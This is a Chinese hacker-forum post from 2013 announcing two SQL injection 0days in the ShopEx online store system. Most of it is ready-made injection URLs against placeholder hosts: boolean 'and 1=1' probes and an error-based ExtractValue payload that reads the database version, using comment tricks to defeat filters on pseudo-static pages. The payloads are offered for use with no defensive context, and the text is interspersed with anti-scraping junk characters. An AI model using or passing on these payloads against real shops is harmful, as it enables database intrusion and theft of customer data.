找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1947|回复: 0
打印 上一主题 下一主题

shopex通杀注入0day漏洞两处

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-19 08:31:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
' {. `+ T/ G4 k) G, [
6 x) `( D4 s; m* D. [& q, v* [好吧,我扯远了~~. x8 L/ Y6 C- N% J
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~7 ]5 V. y8 Q1 A; q- a
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: 0 S$ O8 P/ C1 H/ N

* O' V$ h: k7 ~/ C( l) V1 N; H4 X5 Q0 ~http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
, f  x3 c$ b9 V) t2 Q/ g& R  o5 ^/ b; f2 e+ [* N! ^$ Z( c7 z( d
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
$ J8 n: j" |8 U/ }6 Z( e% a( r/ u7 [2 |/ n5 u
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 1 O# w# l6 V5 [0 {/ J

; ~, P/ z: [- w& Ihttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 5 {! D/ M/ D4 w

0 C& }7 _1 p1 S' h0 L: Z   V' @4 E7 \! Q2 h, |2 M+ F
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。5 _3 [' M. v4 T4 J
如何注入就不多说了,10多年的东西了…不会也会了…
/ o2 P/ p0 z9 \2 h. i/ h" z7 Q* d; ~  Y

* J0 j# w- U1 H4 G( j" L3 P/ N* V- I# I5 x% t$ G( ~

8 a. l7 X$ f  I1 z" j, A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表